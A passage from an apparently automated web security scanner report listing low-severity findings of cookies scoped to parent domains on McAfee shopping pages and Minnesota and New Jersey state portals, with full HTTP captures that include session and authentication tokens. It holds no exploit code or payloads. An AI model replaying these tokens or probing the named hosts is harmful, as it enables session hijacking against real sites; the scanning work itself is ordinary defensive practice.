session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: application/x-javascript; charset=utf-8
Expires: Wed, 21 Apr 2010 22:42:19 GMT
Last-Modified: Thu, 21 Apr 2011 22:42:19 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: SiteID=1; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:45 GMT; path=/; HttpOnly
Set-Cookie: langid=1; domain=mcafee.com; expires=Mon, 29-Apr-2041 21:18:45 GMT; path=/; HttpOnly
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Locale=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:45 GMT; path=/; HttpOnly
Set-Cookie: HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:45 GMT; path=/; HttpOnly
Set-Cookie: AffID=0-0; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Currency=56; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: IscartemptySiteidAffid=no-1-0; domain=mcafee.com; path=/
X-Powered-By: ASP.NET
MS: SJV4
X-UA-Compatible: IE=8
Date: Fri, 29 Apr 2011 21:18:44 GMT
Content-Length: 4551
Connection: close

Type.registerNamespace('McAfee.WebServices');
McAfee.WebServices.AccountWebSvc=function() {
McAfee.WebServices.AccountWebSvc.initializeBase(this);
this._timeout = 0;
this._userContext = null;
thi
...[SNIP]...

13.22. https://home.mcafee.com/secure/cart  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://home.mcafee.com
Path:   /secure/cart

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /secure/cart HTTP/1.1
Host: home.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27mcafee%27%2C%271304109967310%27%5D%5D; lBounceURL=http://home.mcafee.com/secure/cart/; langid=1; HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; AffID=0-0; CookieInformation=locale=us; s_sq=%5B%5BB%5D%5D; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=86873; s_campaign=78228; CampaignId=86873; s_cc=true; HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; IscartemptySiteidAffid=no-1-0; s_nr=1304109967309-New; s_vi=[CS]v1|26DD91D7051D181F-60000106600003DE[CE]; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: SiteID=1; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:29 GMT; path=/; HttpOnly
Set-Cookie: langid=1; domain=mcafee.com; expires=Mon, 29-Apr-2041 21:18:29 GMT; path=/; HttpOnly
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: lBounceURL=http://home.mcafee.com/secure/cart; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Locale=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:29 GMT; path=/; HttpOnly
Set-Cookie: HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:29 GMT; path=/; HttpOnly
Set-Cookie: AffID=0-0; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Currency=56; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: IscartemptySiteidAffid=no-1-0; domain=mcafee.com; path=/
X-Powered-By: ASP.NET
MS: SJV8
X-UA-Compatible: IE=8
Date: Fri, 29 Apr 2011 21:18:29 GMT
Content-Length: 37490
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmldom" xmlns="http://www.w3.org/1999/xhtml" dir="ltr"
...[SNIP]...

13.23. https://home.mcafee.com/secure/cart/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://home.mcafee.com
Path:   /secure/cart/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /secure/cart/ HTTP/1.1
Host: home.mcafee.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SessionInfo=AffiliateId=0&CampaignId=78228; s_cc=true; s_campaign=78228; s_nr=1304109967309-New; s_ev8=%5B%5B%27mcafee%27%2C%271304109967310%27%5D%5D; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26DD91D7051D181F-60000106600003DE[CE]; CampaignId=86873; CookieInformation=locale=us; SiteID=1; SessionInfo=AffiliateId=0&CampaignId=86873; HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; Currency=56; HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f%3fofferId%3d266730%26PkgQty%3d1&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; IscartemptySiteidAffid=no-1-0; AffID=0; Locale=en%2Dus; langid=1; lBounceURL=http%3A%2F%2Fus%2Emcafee%2Ecom%2Froot%2Fbasket%2Easp%3Faffid%3D0%26; lUsrCtxSession=%3CUserContext%3E%3CAffID%3E0%3C%2FAffID%3E%3CAffBuildID%3E0%3C%2FAffBuildID%3E%3C%2FUserContext%3E%0D%0A; session%5Fdata=%3CSessionData%3E%0D%0A%09%3Ctempfrlu%3E%3C%2Ftempfrlu%3E%0D%0A%09%3Cwt%5Fsource%3EOther%3C%2Fwt%5Fsource%3E%0D%0A%09%3COrganicSearchtraffic%3E1%3C%2FOrganicSearchtraffic%3E%0D%0A%09%3Cwt%5Fsource%5Fcid%3E86873%3C%2Fwt%5Fsource%5Fcid%3E%0D%0A%09%3Cwt%5Fdestination%5Fcid%3E86873%3C%2Fwt%5Fdestination%5Fcid%3E%0D%0A%09%3CBasketflowid%3E0%3C%2FBasketflowid%3E%3C%2FSessionData%3E%0D%0A

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: SiteID=1; domain=mcafee.com; expires=Thu, 29-Apr-2021 20:58:11 GMT; path=/; HttpOnly
Set-Cookie: langid=1; domain=mcafee.com; expires=Mon, 29-Apr-2041 20:58:11 GMT; path=/; HttpOnly
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: lBounceURL=http://home.mcafee.com/secure/cart/; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Locale=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 20:58:11 GMT; path=/; HttpOnly
Set-Cookie: HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 20:58:11 GMT; path=/; HttpOnly
Set-Cookie: AffID=0-0; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Currency=56; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: IscartemptySiteidAffid=no-1-0; domain=mcafee.com; path=/
X-Powered-By: ASP.NET
MS: SJV7
X-UA-Compatible: IE=8
Date: Fri, 29 Apr 2011 20:58:10 GMT
Content-Length: 36966


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmldom" xmlns="http://www.w3.org/1999/xhtml" dir="ltr"
...[SNIP]...

13.24. https://home.mcafee.com/secure/purchase/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://home.mcafee.com
Path:   /secure/purchase/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /secure/purchase/ HTTP/1.1
Host: home.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27mcafee%27%2C%271304109967310%27%5D%5D; lBounceURL=http://home.mcafee.com/secure/cart/; langid=1; HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; AffID=0-0; CookieInformation=locale=us; s_sq=%5B%5BB%5D%5D; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=86873; s_campaign=78228; CampaignId=86873; s_cc=true; HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; IscartemptySiteidAffid=no-1-0; s_nr=1304109967309-New; s_vi=[CS]v1|26DD91D7051D181F-60000106600003DE[CE]; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: SiteID=1; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:23 GMT; path=/; HttpOnly
Set-Cookie: langid=1; domain=mcafee.com; expires=Mon, 29-Apr-2041 21:18:23 GMT; path=/; HttpOnly
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: lBounceURL=http://home.mcafee.com/secure/purchase/; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Locale=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:23 GMT; path=/; HttpOnly
Set-Cookie: HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:23 GMT; path=/; HttpOnly
Set-Cookie: AffID=0-0; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Currency=56; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fpurchase%2f&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: IscartemptySiteidAffid=no-1-0; domain=mcafee.com; path=/
X-Powered-By: ASP.NET
MS: SJV2
X-UA-Compatible: IE=8
Date: Fri, 29 Apr 2011 21:18:22 GMT
Content-Length: 37412
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmldom" xmlns="http://www.w3.org/1999/xhtml" dir="ltr"
...[SNIP]...

13.25. https://portal.s4web.state.mn.us/psp/por91ssap/SELFSERVICE/ENTP/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://portal.s4web.state.mn.us
Path:   /psp/por91ssap/SELFSERVICE/ENTP/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /psp/por91ssap/SELFSERVICE/ENTP/ HTTP/1.1
Host: portal.s4web.state.mn.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PS_LOGINLIST=https://portal.s4web.state.mn.us/por91ssap; web2-80-PORTAL-PSJSESSIONID=K4yZN7vCLYHmSmZ61lt95PGKpxvt51Zd!-1405169941; https%3a%2f%2fportal.s4web.state.mn.us%2fpsp%2fpor91ssap%2fselfservice%2fentp%2frefresh=list:||; __utmz=205212754.1304161967.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PS_TOKENEXPIRE=30_Apr_2011_11:15:39_GMT; BIGipServerprodss-SWIFT_https=520792256.35867.0000; SignOnDefault=; __utma=205212754.145768528.1304161967.1304161967.1304161967.1; ExpirePage=https://portal.s4web.state.mn.us/psp/por91ssap/; __utmc=205212754; __utmb=205212754; PS_TOKEN=pwAAAAQDAgEBAAAAvAIAAAAAAAAsAAAABABTaGRyAk4AcQg4AC4AMQAwABRoxgm+6pefEQHwP4IRzFA21F6QGmcAAAAFAFNkYXRhW3icHYpLCoAwDAXHKi7Fi1T81M9WsLpShAouPYP383A+mpAZ8pIXyFKTJPJniFUGPDszjpObhdxzsFGcBFYuHuW6ttQ0ais7sZNtzCpNHzmIA5O2jlFf/KlQC+o=;

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Connection: close
Date: Sat, 30 Apr 2011 12:24:44 GMT
Location: https://portal.s4web.state.mn.us/psp/por91ssap/SELFSERVICE/ENTP/h/?tab=MN_GUEST
Content-Type: text/html
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: web2-80-PORTAL-PSJSESSIONID=qYLRN71M4CpRL303GMjfv1kRpvmQvDhQ!-1405169941; path=/; HttpOnly=
Set-Cookie: https%3a%2f%2fportal.s4web.state.mn.us%2fpsp%2fpor91ssap%2fselfservice%2fentp%2frefresh=list:|||%3ftab%3dmn_guest; domain=.state.mn.us; expires=Saturday, 30-Apr-2011 12:44:44 GMT; path=/; secure
Set-Cookie: PS_TOKENEXPIRE=30_Apr_2011_12:24:44_GMT; domain=.state.mn.us; path=/; secure
Set-Cookie: SignOnDefault=; domain=.state.mn.us; path=/; secure
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 353

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://portal.s4web.state.mn.us/p
...[SNIP]...

13.26. https://portal.s4web.state.mn.us/psp/por91ssap/SELFSERVICE/ENTP/h/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://portal.s4web.state.mn.us
Path:   /psp/por91ssap/SELFSERVICE/ENTP/h/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /psp/por91ssap/SELFSERVICE/ENTP/h/?tab=MN_GUEST& HTTP/1.1
Host: portal.s4web.state.mn.us
Connection: keep-alive
Referer: http://www.state.mn.us/portal/mn/jsp/home.do?agency=NorthStar
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=205212754.145768528.1304161967.1304161967.1304161967.1; __utmb=205212754; __utmc=205212754; __utmz=205212754.1304161967.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); web2-80-PORTAL-PSJSESSIONID=FRMYN7vQyWCl2GvSTnjKccNL4TyQstPG!-1405169941; BIGipServerprodss-SWIFT_https=520792256.35867.0000

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Cache-Control: no-store
Connection: close
Date: Sat, 30 Apr 2011 11:17:50 GMT
Location: https://portal.s4web.state.mn.us/psp/por91ssap/SELFSERVICE/ENTP/h/?tab=MN_GUEST
Content-Type: text/html
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: web2-80-PORTAL-PSJSESSIONID=F2dNN7vpBYLspdSKYyfMGvL3QlThTrNg!-1405169941; path=/; HttpOnly=
Set-Cookie: https%3a%2f%2fportal.s4web.state.mn.us%2fpsp%2fpor91ssap%2fselfservice%2fentp%2frefresh=list: %3ftab%3dmn_guest; domain=.state.mn.us; expires=Saturday, 30-Apr-2011 11:37:50 GMT; path=/; secure
Set-Cookie: ExpirePage=https://portal.s4web.state.mn.us/psp/por91ssap/; domain=.state.mn.us; path=/; secure
Set-Cookie: PS_LOGINLIST=https://portal.s4web.state.mn.us/por91ssap; domain=.state.mn.us; path=/; secure
Set-Cookie: PS_TOKENEXPIRE=30_Apr_2011_11:17:50_GMT; domain=.state.mn.us; path=/; secure
Set-Cookie: PS_TOKEN=pgAAAAQDAgEBAAAAvAIAAAAAAAAsAAAABABTaGRyAk4AcQg4AC4AMQAwABQCDU5YTa3H7AOgmr8ND8Tx8IqdoWYAAAAFAFNkYXRhWnicHYlJCoAwEATLBY/iRyIajXoVXE5KIIJH3+D/fJxNZpiqofsF8ixNEvlLiVMFVg5mejw3C8XKyU7pCWxcPMrVWhparZF7sZNNzGrdKDqsODDpc5H8qZwL8A==; domain=.state.mn.us; path=/; secure
Set-Cookie: SignOnDefault=; domain=.state.mn.us; path=/; secure
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 353

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://portal.s4web.state.mn.us/p
...[SNIP]...

13.27. https://portal01.state.nj.us/http:/portal20.sa.state.nj.us:8080/amserver/UI/Login  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://portal01.state.nj.us
Path:   /http:/portal20.sa.state.nj.us:8080/amserver/UI/Login

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /http:/portal20.sa.state.nj.us:8080/amserver/UI/Login HTTP/1.1
Host: portal01.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 30 Apr 2011 12:24:49 GMT
Content-type: text/html;charset=UTF-8
Cache-control: private
Expires: 0
X-dsameversion: 7 2005Q4 patch 120954-12
Am_client_type: genericHTML
Set-Cookie: %2Fportal20.sa.state.nj.us_JSESSIONID=B1981083223B49AAF8B9D753FAD991EB|portal20.sa.state.nj.us|/|iplanet; domain=.state.nj.us; path=/
Set-Cookie: %2F.state.nj.us_AMAuthCookie=AQIC5wM2LY4Sfcx9UjpVfeUFx19Ud%252FeRI7S2%252FxpJgtc3zKY%253D%2540AAJTSQACMDE%253D%2523|.state.nj.us|/|iplanet; domain=.state.nj.us; path=/
Set-Cookie: %2F.state.nj.us_amlbcookie=01|.state.nj.us|/|iplanet; domain=.state.nj.us; path=/
Content-Length: 6736
Connection: close


<html>


<head>
<title>Log On To myNewJersey</title>


<link rel="stylesheet" href="https://portal01.state.nj.us/http://portal20.sa.state.nj.us:8080/oit/styles/mynj3.css" type="text/css">
<
...[SNIP]...

13.28. http://us.mcafee.com/root/basket.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://us.mcafee.com
Path:   /root/basket.asp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /root/basket.asp?affid=0& HTTP/1.1
Host: us.mcafee.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
